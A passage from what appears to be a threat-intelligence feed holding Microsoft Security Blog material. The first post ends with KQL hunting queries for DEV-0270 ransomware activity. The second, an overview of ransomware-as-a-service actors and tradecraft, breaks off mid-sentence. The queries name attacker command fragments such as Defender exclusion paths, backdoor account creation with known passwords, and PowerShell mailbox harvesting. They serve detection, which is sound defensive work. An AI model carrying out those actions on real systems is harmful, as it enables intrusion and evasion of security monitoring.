PowerShell. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Add%20malicious%20user%20to%20Admins%20and%20RDP%20users%20group%20via%20PowerShell.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ 'powershell.exe'\n | where InitiatingProcessCommandLine has_all('$admins=', 'System.Security.Principal.SecurityIdentifier', 'Translate', '-split', 'localgroup', '/add', '$rdp=')\n\n**Email data exfiltration via PowerShell**\n\nIdentify email exfiltration conducted by PowerShell. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml>)\n \n \n DeviceProcessEvents\n | where FileName =~ 'powershell.exe'\n | where ProcessCommandLine has_all('Add-PSSnapin', 'Get-Recipient', '-ExpandProperty', 'EmailAddresses', 'SmtpAddress', '-hidetableheaders')\n\n**Create new user with known DEV-0270 username/password** \nSearch for the creation of a new user using a known DEV-0270 username/password schema. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Create%20new%20user%20with%20known%20DEV-0270%20username%20and%20password.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessCommandLine has_all('net user', '/add')\n | parse InitiatingProcessCommandLine with * \"user \" username \" \"*\n | extend password = extract(@\"\\buser\\s+[^\\s]+\\s+([^\\s]+)\", 1, InitiatingProcessCommandLine)\n | where username in('DefaultAccount') or password in('P@ssw0rd1234', '_AS_@1394')\n\n**PowerShell adding exclusion path for Microsoft Defender of ProgramData**\n\nIdentify PowerShell creating an exclusion path of ProgramData directory for Microsoft Defender to not monitor. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/PowerShell%20adding%20exclusion%20path%20for%20Microsoft%20Defender%20of%20ProgramData.yaml>)\n \n \n DeviceProcessEvents\n | where FileName =~ \"powershell.exe\" and ProcessCommandLine has_all(\"try\", \"Add-MpPreference\", \"-ExclusionPath\", \"ProgramData\", \"catch\")\n \n\n**DLLHost.exe WMIC domain discovery**\n\nIdentify dllhost.exe using WMIC to discover additional hosts and associated domain. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/DLLHost.exe%20WMIC%20domain%20discovery.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ \"dllhost.exe\" and InitiatingProcessCommandLine == \"dllhost.exe\"\n | where ProcessCommandLine has \"wmic computersystem get domain\"\n \n\nThe post [Profiling DEV-0270: PHOSPHORUS\u2019 ransomware operations](<https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-09-07T21:00:00", "type": "mssecure", "title": "Profiling DEV-0270: PHOSPHORUS\u2019 ransomware operations", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-44228"], "modified": "2022-09-07T21:00:00", "id": "MSSECURE:1E3441B57C08BC18202B9FE758C2CA71", "href": "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T15:51:15", "description": "Microsoft processes 24 trillion signals every 24 hours, and we have blocked billions of attacks in the last year alone. Microsoft Security tracks more than 35 unique ransomware families and 250 unique threat actors across observed nation-state, ransomware, and criminal activities.\n\nThat depth of signal intelligence gathered from various domains\u2014identity, email, data, and cloud\u2014provides us with insight into the gig economy that attackers have created with tools designed to lower the barrier for entry for other attackers, who in turn continue to pay dividends and fund operations through the sale and associated \u201ccut\u201d from their tool\u2019s success.\n\nThe cybercriminal economy is a continuously evolving connected ecosystem of many players with different techniques, goals, and skillsets. In the same way our traditional economy has shifted toward gig workers for efficiency, criminals are learning that there\u2019s less work and less risk involved by renting or selling their tools for a portion of the profits than performing the attacks themselves. This industrialization of the cybercrime economy has made it easier for attackers to use ready-made penetration testing and other tools to perform their attacks.\n\nWithin this category of threats, Microsoft has been tracking the trend in the ransomware-as-a-service (RaaS) gig economy, called [human-operated ransomware](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>), which remains one of the most impactful threats to organizations. We coined the industry term \u201chuman-operated ransomware\u201d to clarify that these threats are driven by humans who make decisions at every stage of their attacks based on what they find in their target\u2019s network.\n\nUnlike the broad targeting and opportunistic approach of earlier ransomware infections, attackers behind these human-operated campaigns vary their attack patterns depending on their discoveries\u2014for example, a security product that isn\u2018t configured to prevent tampering or a service that\u2019s running as a highly privileged account like a domain admin. Attackers can use those weaknesses to elevate their privileges to steal even more valuable data, leading to a bigger payout for them\u2014with no guarantee they\u2019ll leave their target environment once they\u2019ve been paid. Attackers are also often more determined to stay on a network once they gain access and sometimes repeatedly monetize that access with additional attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nRansomware attacks have become even more impactful in recent years as more ransomware-as-a-service ecosystems have adopted the double extortion monetization strategy. All ransomware is a form of extortion, but now, attackers are not only encrypting data on compromised devices but also exfiltrating it and then posting or threatening to post it publicly to pressure the targets into paying the ransom. Most ransomware attackers opportunistically deploy ransomware to whatever network they get access to, and some even purchase access to networks from other cybercriminals. Some attackers prioritize organizations with higher revenues, while others prefer specific industries for the shock value or type of data they can exfiltrate.\n\nAll human-operated ransomware campaigns\u2014all human-operated attacks in general, for that matter\u2014share common dependencies on security weaknesses that allow them to succeed. Attackers most commonly take advantage of **an organization\u2019s poor credential hygiene and legacy configurations or misconfigurations to find easy entry and privilege escalation points in an environment.** \n\nIn this blog, we detail several of the ransomware ecosystems using the RaaS model, the importance of cross-domain visibility in finding and evicting these actors, and best practices organizations can use to protect themselves from this increasingly popular style of attack. We also offer security best practices on credential hygiene and cloud hardening, how to address security blind spots, harden internet-facing assets to understand your perimeter, and more. Here\u2019s a quick table of contents:\n\n 1. **How RaaS redefines our understanding of ransomware incidents**\n * The RaaS affiliate model explained\n * Access for sale and mercurial targeting\n 2. **\u201cHuman-operated\u201d means human decisions**\n * Exfiltration and double extortion\n * Persistent and sneaky access methods\n 3. **Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks**\n 4. **Defending against ransomware: Moving beyond protection by detection**\n * Building credential hygiene\n * Auditing credential exposure\n * Prioritizing deployment of Active Directory updates\n * Cloud hardening\n * Addressing security blind spots\n * Reducing the attack surface\n * Hardening internet-facing assets and understanding your perimeter\n\n## How RaaS redefines our understanding of ransomware incidents\n\nWith ransomware being the preferred method for many cybercriminals to monetize attacks, human-operated ransomware remains one of the most impactful threats to organizations today, and it only continues to evolve. This evolution is driven by the \u201chuman-operated\u201d aspect of these attacks\u2014attackers make informed and calculated decisions, resulting in varied attack patterns tailored specifically to their targets and iterated upon until the attackers are successful or evicted.\n\nIn the past, we\u2019ve observed a tight relationship between the initial entry vector, tools, and ransomware payload choices in each campaign of one strain of ransomware. The RaaS affiliate model, which has allowed more criminals, regardless of technical expertise, to deploy ransomware built or managed by someone else, is weakening this link. As ransomware deployment becomes a gig economy, it has become more difficult to link the tradecraft used in a specific attack to the ransomware payload developers.\n\nReporting a ransomware incident by assigning it with the payload name gives the impression that a monolithic entity is behind all attacks using the same ransomware payload and that all incidents that use the ransomware share common techniques and infrastructure. However, focusing solely on the ransomware stage obscures many stages of the attack that come before, including actions like data exfiltration and additional persistence mechanisms, as well as the numerous detection and protection opportunities for network defenders.\n\nWe know, for example, that the underlying techniques used in human-operated ransomware campaigns haven\u2019t changed very much over the years\u2014attacks still prey on the same security misconfigurations to succeed. Securing a large corporate network takes disciplined and sustained focus, but there\u2019s a high ROI in implementing critical controls that prevent these attacks from having a wider impact, even if it\u2019s only possible on the most critical assets and segments of the network. \n\nWithout the ability to steal access to highly privileged accounts, attackers can\u2019t move laterally, spread ransomware widely, access data to exfiltrate, or use tools like Group Policy to impact security settings. Disrupting common attack patterns by applying security controls also reduces alert fatigue in security SOCs by stopping the attackers before they get in. This can also prevent unexpected consequences of short-lived breaches, such as exfiltration of network topologies and configuration data that happens in the first few minutes of execution of some trojans.\n\nIn the following sections, we explain the RaaS affiliate model and disambiguate between the attacker tools and the various threat actors at play during a security incident. Gaining this clarity helps surface trends and common attack patterns that inform defensive strategies focused on preventing attacks rather than detecting ransomware payloads. Threat intelligence and insights from this research also enrich our solutions like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), whose comprehensive security capabilities help protect customers by detecting RaaS-related attack attempts.\n\n### The RaaS affiliate model explained\n\nThe cybercriminal economy\u2014a connected ecosystem of many players with different techniques, goals, and skillsets\u2014is evolving. The industrialization of attacks has progressed from attackers using off-the-shelf tools, such as Cobalt Strike, to attackers being able to purchase access to networks and the payloads they deploy to them. This means that the impact of a successful ransomware and extortion attack remains the same regardless of the attacker\u2019s skills.\n\nRaaS is an arrangement between an operator and an affiliate. The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. The RaaS program may also include a leak site to share snippets of data exfiltrated from victims, allowing attackers to show that the exfiltration is real and try to extort payment. Many RaaS programs further incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure, and cryptocurrency transaction services\n\nRaaS thus gives a unified appearance of the payload or campaign being a single ransomware family or set of attackers. However, what happens is that the RaaS operator sells access to the ransom payload and decryptor to an affiliate, who performs the intrusion and privilege escalation and who is responsible for the deployment of the actual ransomware payload. The parties then split the profit. In addition, RaaS developers and operators might also use the payload for profit, sell it, and run their campaigns with other ransomware payloads\u2014further muddying the waters when it comes to tracking the criminals behind these actions.\n\nFigure 1. How the RaaS affiliate model enables ransomware attacks\n\n### Access for sale and mercurial targeting\n\nA component of the cybercriminal economy is selling access to systems to other attackers for various purposes, including ransomware. Access brokers can, for instance, infect systems with malware or a botnet and then sell them as a \u201cload\u201d. A load is designed to install other malware or backdoors onto the infected systems for other criminals. Other access brokers scan the internet for vulnerable systems, like exposed Remote Desktop Protocol (RDP) systems with weak passwords or unpatched systems, and then compromise them _en masse_ to \u201cbank\u201d for later profit. Some advertisements for the sale of initial access specifically cite that a system isn\u2019t managed by an antivirus or endpoint detection and response (EDR) product and has a highly privileged credential such as Domain Administrator associated with it to fetch higher prices.\n\nMost ransomware attackers opportunistically deploy ransomware to whatever network they get access to. Some attackers prioritize organizations with higher revenues, while some target specific industries for the shock value or type of data they can exfiltrate (for example, attackers targeting hospitals or exfiltrating data from technology companies). In many cases, the targeting doesn\u2019t manifest itself as specifically attacking the target\u2019s network, instead, the purchase of access from an access broker or the use of existing malware infection to pivot to ransomware activities.\n\nIn some ransomware attacks, the affiliates who bought a load or access may not even know or care how the system was compromised in the first place and are just using it as a \u201cjump server\u201d to perform other actions in a network. Access brokers often list the network details for the access they are selling, but affiliates aren\u2019t usually interested in the network itself but rather the monetization potential. As a result, some attacks that seem targeted to a specific industry might simply be a case of affiliates purchasing access based on the number of systems they could deploy ransomware to and the perceived potential for profit.\n\n## \u201cHuman-operated\u201d means human decisions\n\nMicrosoft coined the term \u201chuman-operated ransomware\u201d to clearly define a class of attacks driven by expert human intelligence at every step of the attack chain and culminate in intentional business disruption and extortion. Human-operated ransomware attacks share commonalities in the security misconfigurations of which they take advantage and the manual techniques used for lateral movement and persistence. However, the human-operated nature of these actions means that variations in attacks\u2014including objectives and pre-ransom activity\u2014evolve depending on the environment and the unique opportunities identified by the attackers.\n\nThese attacks involve many reconnaissance activities that enable human operators to profile the organization and know what next steps to take based on specific knowledge of the target. Many of the initial access campaigns that provide access to RaaS affiliates perform automated reconnaissance and exfiltration of information collected in the first few minutes of an attack.\n\nAfter the attack shifts to a hands-on-keyboard phase, the reconnaissance and activities based on this knowledge can vary, depending on the tools that come with the RaaS and the operator\u2019s skill. Frequently attackers query for the currently running security tools, privileged users, and security settings such as those defined in Group Policy before continuing their attack. The data discovered via this reconnaissance phase informs the attacker\u2019s next steps.\n\nIf there\u2019s minimal security hardening to complicate the attack and a highly privileged account can be gained immediately, attackers move directly to deploying ransomware by editing a Group Policy. The attackers take note of security products in the environment and attempt to tamper with and disable these, sometimes using scripts or tools provided with RaaS purchase that try to disable multiple security products at once, other times using specific commands or techniques performed by the attacker. \n\nThis human decision-making early in the reconnaissance and intrusion stages means that even if a target\u2019s security solutions detect specific techniques of an attack, the attackers may not get fully evicted from the network and can use other collected knowledge to attempt to continue the attack in ways that bypass security controls. In many instances, attackers test their attacks \u201cin production\u201d from an undetected location in their target\u2019s environment, deploying tools or payloads like commodity malware. If these tools or payloads are detected and blocked by an antivirus product, the attackers simply grab a different tool, modify their payload, or tamper with the security products they encounter. Such detections could give SOCs a false sense of security that their existing solutions are working. However, these could merely serve as a smokescreen to allow the attackers to further tailor an attack chain that has a higher probability of success. Thus, when the attack reaches the active attack stage of deleting backups or shadow copies, the attack would be minutes away from ransomware deployment. The adversary would likely have already performed harmful actions like the exfiltration of data. This knowledge is key for SOCs responding to ransomware: prioritizing investigation of alerts or detections of tools like Cobalt Strike and performing swift remediation actions and incident response (IR) procedures are critical for containing a human adversary before the ransomware deployment stage.\n\n### Exfiltration and double extortion\n\nRansomware attackers often profit simply by disabling access to critical systems and causing system downtime. Although that simple technique often motivates victims to pay, it is not the only way attackers can monetize their access to compromised networks. Exfiltration of data and \u201cdouble extortion,\u201d which refers to attackers threatening to leak data if a ransom hasn\u2019t been paid, has also become a common tactic among many RaaS affiliate programs\u2014many of them offering a unified leak site for their affiliates. Attackers take advantage of common weaknesses to exfiltrate data and demand ransom without deploying a payload.\n\nThis trend means that focusing on protecting against ransomware payloads via security products or encryption, or considering backups as the main defense against ransomware, instead of comprehensive hardening, leaves a network vulnerable to all the stages of a human-operated ransomware attack that occur before ransomware deployment. This exfiltration can take the form of using tools like Rclone to sync to an external site, setting up email transport rules, or uploading files to cloud services. With double extortion, attackers don\u2019t need to deploy ransomware and cause downtime to extort money. Some attackers have moved beyond the need to deploy ransomware payloads and are shifting straight to extortion models or performing the destructive objectives of their attacks by directly deleting cloud resources. One such extortion attackers is DEV-0537 (also known as LAPSUS$), which is profiled below. \n\n### Persistent and sneaky access methods\n\nPaying the ransom may not reduce the risk to an affected network and potentially only serves to fund cybercriminals. Giving in to the attackers\u2019 demands doesn\u2019t guarantee that attackers ever \u201cpack their bags\u201d and leave a network. Attackers are more determined to stay on a network once they gain access and sometimes repeatedly monetize attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nThe handoff between different attackers as transitions in the cybercriminal economy occur means that multiple attackers may retain persistence in a compromised environment using an entirely different set of tools from those used in a ransomware attack. For example, initial access gained by a banking trojan leads to a Cobalt Strike deployment, but the RaaS affiliate that purchased the access may choose to use a less detectable remote access tool such as TeamViewer to maintain persistence on the network to operate their broader series of campaigns. Using legitimate tools and settings to persist versus malware implants such as Cobalt Strike is a popular technique among ransomware attackers to avoid detection and remain resident in a network for longer.\n\nSome of the common enterprise tools and techniques for persistence that Microsoft has observed being used include:\n\n * AnyDesk\n * Atera Remote Management\n * ngrok.io\n * Remote Manipulator System\n * Splashtop\n * TeamViewer\n\nAnother popular technique attackers perform once they attain privilege access is the creation of new backdoor user accounts, whether local or in Active Directory. These newly created accounts can then be added to remote access tools such as a virtual private network (VPN) or Remote Desktop, granting remote access through accounts that appear legitimate on the network. Ransomware attackers have also been observed editing the settings on systems to enable Remote Desktop, reduce the protocol\u2019s security, and add new users to the Remote Desktop Users group.\n\nThe time between initial access to a hands-on keyboard deployment can vary wildly depending on the groups and their workloads or motivations. Some activity groups can access thousands of potential targets and work through these as their staffing allows, prioritizing based on potential ransom payment over several months. While some activity groups may have access to large and highly resourced companies, they prefer to attack smaller companies for less overall ransom because they can execute the attack within hours or days. In addition, the return on investment is higher from companies that can\u2019t respond to a major incident. Ransoms of tens of millions of dollars receive much attention but take much longer to develop. Many groups prefer to ransom five to 10 smaller targets in a month because the success rate at receiving payment is higher in these targets. Smaller organizations that can\u2019t afford an IR team are often more likely to pay tens of thousands of dollars in ransom than an organization worth millions of dollars because the latter has a developed IR capability and is likely to follow legal advice against paying. In some instances, a ransomware associate threat actor may have an implant on a network and never convert it to ransom activity. In other cases, initial access to full ransom (including handoff from an access broker to a RaaS affiliate) takes less than an hour.\n\nFigure 2. Human-operated ransomware targeting and rate of success, based on a sampling of Microsoft data over six months between 2021 and 2022\n\nThe human-driven nature of these attacks and the scale of possible victims under control of ransomware-associated threat actors underscores the need to take targeted proactive security measures to harden networks and prevent these attacks in their early stages.\n\n## Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks\n\nFor organizations to successfully respond to evict an active attacker, it\u2019s important to understand the active stage of an ongoing attack. In the early attack stages, such as deploying a banking trojan, common remediation efforts like isolating a system and resetting exposed credentials may be sufficient. As the attack progresses and the attacker performs reconnaissance activities and exfiltration, it\u2019s important to implement an incident response process that scopes the incident to address the impact specifically. Using a threat intelligence-driven methodology for understanding attacks can assist in determining incidents that need additional scoping.\n\nIn the next sections, we provide a deep dive into the following prominent ransomware threat actors and their campaigns to increase community understanding of these attacks and enable organizations to better protect themselves:\n\n * DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today \n * ELBRUS: (Un)arrested development\n * DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n * DEV-0237: Prolific collaborator\n * DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n * DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n * DEV-0537: From extortion to destruction\n\nMicrosoft threat intelligence directly informs our products as part of our commitment to track adversaries and protect customers. Microsoft 365 Defender customers should prioritize alerts titled \u201cRansomware-linked emerging threat activity group detected\u201d. We also add the note \u201cOngoing hands-on-keyboard attack\u201d to alerts that indicate a human attacker is in the network. When these alerts are raised, it\u2019s highly recommended to initiate an incident response process to scope the attack, isolate systems, and regain control of credentials attackers may be in control of.\n\nA note on threat actor naming: as part of Microsoft\u2019s ongoing commitment to track both nation-state and cybercriminal threat actors, we refer to the unidentified threat actors as a \u201cdevelopment group\u201d. We use a naming structure with a prefix of \u201cDEV\u201d to indicate an emerging threat group or unique activity during investigation. When a nation-state group moves out of the DEV stage, we use chemical elements (for example, PHOSPHOROUS and NOBELIUM) to name them. On the other hand, we use volcano names (such as ELBRUS) for ransomware or cybercriminal activity groups that have moved out of the DEV state. In the cybercriminal economy, relationships between groups change very rapidly. Attackers are known to hire talent from other cybercriminal groups or use \u201ccontractors,\u201d who provide gig economy-style work on a limited time basis and may not rejoin the group. This shifting nature means that many of the groups Microsoft tracks are labeled as DEV, even if we have a concrete understanding of the nature of the activity group.\n\n### DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today\n\nA vast amount of the current cybercriminal economy connects to a nexus of activity that Microsoft tracks as DEV-0193, also referred to as Trickbot LLC. DEV-0193 is responsible for developing, distributing, and managing many different payloads, including Trickbot, Bazaloader, and AnchorDNS. In addition, DEV-0193 managed the Ryuk RaaS program before the latter\u2019s shutdown in June 2021, and Ryuk\u2019s successor, Conti as well as Diavol. Microsoft has been tracking the activities of DEV-0193 since October 2020 and has observed their expansion from developing and distributing the Trickbot malware to becoming the most prolific ransomware-associated cybercriminal activity group active today. \n\nDEV-0193\u2019s actions and use of the cybercriminal gig economy means they often add new members and projects and utilize contractors to perform various parts of their intrusions. As other malware operations have shut down for various reasons, including legal actions, DEV-0193 has hired developers from these groups. Most notable are the acquisitions of developers from Emotet, Qakbot, and IcedID, bringing them to the DEV-0193 umbrella.\n\nA subgroup of DEV-0193, which Microsoft tracks as DEV-0365, provides infrastructure-as-a-service for cybercriminals. Most notably, DEV-0365 provides Cobalt Strike Beacon-as-a-service. These DEV-0365 Beacons have replaced unique C2 infrastructure in many active malware campaigns. DEV-0193 infrastructure has also been [implicated](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in attacks deploying novel techniques, including exploitation of CVE-2021-40444. \n\nThe leaked chat files from a group publicly labeled as the \u201cConti Group\u201d in February 2022 confirm the wide scale of DEV-0193 activity tracked by Microsoft. Based on our telemetry from 2021 and 2022, Conti has become one of the most deployed RaaS ecosystems, with multiple affiliates concurrently deploying their payload\u2014even as other RaaS ecosystems (DarkSide/BlackMatter and REvil) ceased operations. However, payload-based attribution meant that much of the activity that led to Conti ransomware deployment was attributed to the \u201cConti Group,\u201d even though many affiliates had wildly different tradecraft, skills, and reporting structures. Some Conti affiliates performed small-scale intrusions using the tools offered by the RaaS, while others performed weeks-long operations involving data exfiltration and extortion using their own techniques and tools. One of the most prolific and successful Conti affiliates\u2014and the one responsible for developing the \u201cConti Manual\u201d leaked in August 2021\u2014is tracked as DEV-0230. This activity group also developed and deployed the FiveHands and HelloKitty ransomware payloads and often gained access to an organization via DEV-0193\u2019s BazaLoader infrastructure.\n\n### ELBRUS: (Un)arrested development\n\nELBRUS, also known as FIN7, has been known to be in operation since 2012 and has run multiple campaigns targeting a broad set of industries for financial gain. ELBRUS has deployed point-of-sale (PoS) and ATM malware to collect payment card information from in-store checkout terminals. They have also targeted corporate personnel who have access to sensitive financial data, including individuals involved in SEC filings.\n\nIn 2018, this activity group made headlines when [three of its members were arrested](<https://www.justice.gov/opa/pr/three-members-notorious-international-cybercrime-group-fin7-custody-role-attacking-over-100>). In May 2020, another arrest was made for an individual with alleged involvement with ELBRUS. However, despite law enforcement actions against suspected individual members, Microsoft has observed sustained campaigns from the ELBRUS group itself during these periods.\n\nELBRUS is responsible for developing and distributing multiple custom malware families used for persistence, including JSSLoader and Griffon. ELBRUS has also created fake security companies called \u201cCombi Security\u201d and \u201cBastion Security\u201d to facilitate the recruitment of employees to their operations under the pretense of working as penetration testers.\n\nIn 2020 ELBRUS transitioned from using PoS malware to deploying ransomware as part of a financially motivated extortion scheme, specifically deploying the MAZE and Revil RaaS families. ELBRUS developed their own RaaS ecosystem named DarkSide. They deployed DarkSide payloads as part of their operations and recruited and managed affiliates that deployed the DarkSide ransomware. The tendency to report on ransomware incidents based on payload and attribute it to a monolithic gang often obfuscates the true relationship between the attackers, which is very accurate of the DarkSide RaaS. Case in point, one of the most infamous DarkSide deployments wasn\u2019t performed by ELBRUS but by a ransomware-as-a-service affiliate Microsoft tracks as DEV-0289.\n\nELBRUS retired the DarkSide ransomware ecosystem in May 2021 and released its successor, BlackMatter, in July 2021. Replicating their patterns from DarkSide, ELBRUS deployed BlackMatter themselves and ran a RaaS program for affiliates. The activity group then retired the BlackMatter ransomware ecosystem in November 2021.\n\nWhile they aren\u2019t currently publicly observed to be running a RaaS program, ELBRUS is very active in compromising organizations via phishing campaigns that lead to their JSSLoader and Griffon malware. Since 2019, ELBRUS has partnered with DEV-0324 to distribute their malware implants. DEV-0324 acts as a distributor in the cybercriminal economy, providing a service to distribute the payloads of other attackers through phishing and exploit kit vectors. ELBRUS has also been abusing CVE-2021-31207 in Exchange to compromise organizations in April of 2022, an interesting pivot to using a less popular authenticated vulnerability in the ProxyShell cluster of vulnerabilities. This abuse has allowed them to target organizations that patched only the unauthenticated vulnerability in their Exchange Server and turn compromised low privileged user credentials into highly privileged access as SYSTEM on an Exchange Server. \n\n### DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n\nAn excellent example of how clustering activity based on ransomware payload alone can lead to obfuscating the threat actors behind the attack is DEV-0504. DEV-0504 has deployed at least six RaaS payloads since 2020, with many of their attacks becoming high-profile incidents attributed to the \u201cREvil gang\u201d or \u201cBlackCat ransomware group\u201d. This attribution masks the actions of the set of the attackers in the DEV-0504 umbrella, including other REvil and BlackCat affiliates. This has resulted in a confusing story of the scale of the ransomware problem and overinflated the impact that a single RaaS program shutdown can have on the threat environment. \n\nFigure 3. Ransomware payloads distributed by DEV-0504 between 2020 and April 2022\n\nDEV-0504 shifts payloads when a RaaS program shuts down, for example the deprecation of REvil and BlackMatter, or possibly when a program with a better profit margin appears. These market dynamics aren\u2019t unique to DEV-0504 and are reflected in most RaaS affiliates. They can also manifest in even more extreme behavior where RaaS affiliates switch to older \u201cfully owned\u201d ransomware payloads like Phobos, which they can buy when a RaaS isn\u2019t available, or they don\u2019t want to pay the fees associated with RaaS programs.\n\nDEV-0504 appears to rely on access brokers to enter a network, using Cobalt Strike Beacons they have possibly purchased access to. Once inside a network, they rely heavily on PsExec to move laterally and stage their payloads. Their techniques require them to have compromised elevated credentials, and they frequently disable antivirus products that aren\u2019t protected with tamper protection.\n\nDEV-0504 was responsible for deploying BlackCat ransomware in companies in the energy sector in January 2022. Around the same time, DEV-0504 also deployed BlackCat in attacks against companies in the fashion, tobacco, IT, and manufacturing industries, among others.\n\n### DEV-0237: Prolific collaborator\n\nLike DEV-0504, DEV-0237 is a prolific RaaS affiliate that alternates between different payloads in their operations based on what is available. DEV-0237 heavily used Ryuk and Conti payloads from Trickbot LLC/DEV-0193, then Hive payloads more recently. Many publicly documented Ryuk and Conti incidents and tradecraft can be traced back to DEV-0237.\n\nAfter the activity group switched to Hive as a payload, a large uptick in Hive incidents was observed. Their switch to the BlackCat RaaS in March 2022 is suspected to be due to [public discourse](<https://www.securityweek.com/researchers-devise-method-decrypt-hive-ransomware-encrypted-data>) around Hive decryption methodologies; that is, DEV-0237 may have switched to BlackCat because they didn\u2019t want Hive\u2019s decryptors to interrupt their business. Overlap in payloads has occurred as DEV-0237 experiments with new RaaS programs on lower-value targets. They have been observed to experiment with some payloads only to abandon them later.\n\n_Figure 4. Ransomware payloads distributed by DEV-0237 between 2020 and April 2022_\n\nBeyond RaaS payloads, DEV-0237 uses the cybercriminal gig economy to also gain initial access to networks. DEV-0237\u2019s proliferation and success rate come in part from their willingness to leverage the network intrusion work and malware implants of other groups versus performing their own initial compromise and malware development.\n\nFigure 5. Examples of DEV-0237\u2019s relationships with other cybercriminal activity groups\n\nLike all RaaS operators, DEV-0237 relies on compromised, highly privileged account credentials and security weaknesses once inside a network. DEV-0237 often leverages Cobalt Strike Beacon dropped by the malware they have purchased, as well as tools like SharpHound to conduct reconnaissance. The group often utilizes BITSadmin /transfer to stage their payloads. An often-documented trademark of Ryuk and Conti deployments is naming the ransomware payload _xxx.exe_, a tradition that DEV-0237 continues to use no matter what RaaS they are deploying, as most recently observed with BlackCat. In late March of 2022, DEV-0237 was observed to be using a new version of Hive again.\n\n### DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n\nMalvertising, which refers to taking out a search engine ad to lead to a malware payload, has been used in many campaigns, but the access broker that Microsoft tracks as DEV-0206 uses this as their primary technique to gain access to and profile networks. Targets are lured by an ad purporting to be a browser update, or a software package, to download a ZIP file and double-click it. The ZIP package contains a JavaScript file (.js), which in most environments runs when double-clicked. Organizations that have changed the settings such that script files open with a text editor by default instead of a script handler are largely immune from this threat, even if a user double clicks the script.\n\nOnce successfully executed, the JavaScript framework, also referred to [SocGholish](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us>), acts as a loader for other malware campaigns that use access purchased from DEV-0206, most commonly Cobalt Strike payloads. These payloads have, in numerous instances, led to custom Cobalt Strike loaders attributed to DEV-0243. DEV-0243 falls under activities tracked by the cyber intelligence industry as \u201cEvilCorp,\u201d The custom Cobalt Strike loaders are similar to those seen in publicly documented [Blister](<https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign>) malware\u2019s inner payloads. In DEV-0243\u2019s initial partnerships with DEV-0206, the group deployed a custom ransomware payload known as WastedLocker, and then expanded to additional DEV-0243 ransomware payloads developed in-house, such as PhoenixLocker and Macaw.\n\nAround November 2021, DEV-0243 started to deploy the LockBit 2.0 RaaS payload in their intrusions. The use of a RaaS payload by the \u201cEvilCorp\u201d activity group is likely an attempt by DEV-0243 to avoid attribution to their group, which could discourage payment due to their sanctioned status. \n\nFigure 6. The handover from DEV-0206 to DEV-0243\n\n### DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n\nDiffering from the other RaaS developers, affiliates, and access brokers profiled here, DEV-0401 appears to be an activity group involved in all stages of their attack lifecycle, from initial access to ransomware development. Despite this, they seem to take some inspiration from successful RaaS operations with the frequent rebranding of their ransomware payloads. Unique among human-operated ransomware threat actors tracked by Microsoft, DEV-0401 [is confirmed to be a China-based activity group.](<https://twitter.com/MsftSecIntel/status/1480730559739359233>)\n\nDEV-0401 differs from many of the attackers who rely on purchasing access to existing malware implants or exposed RDP to 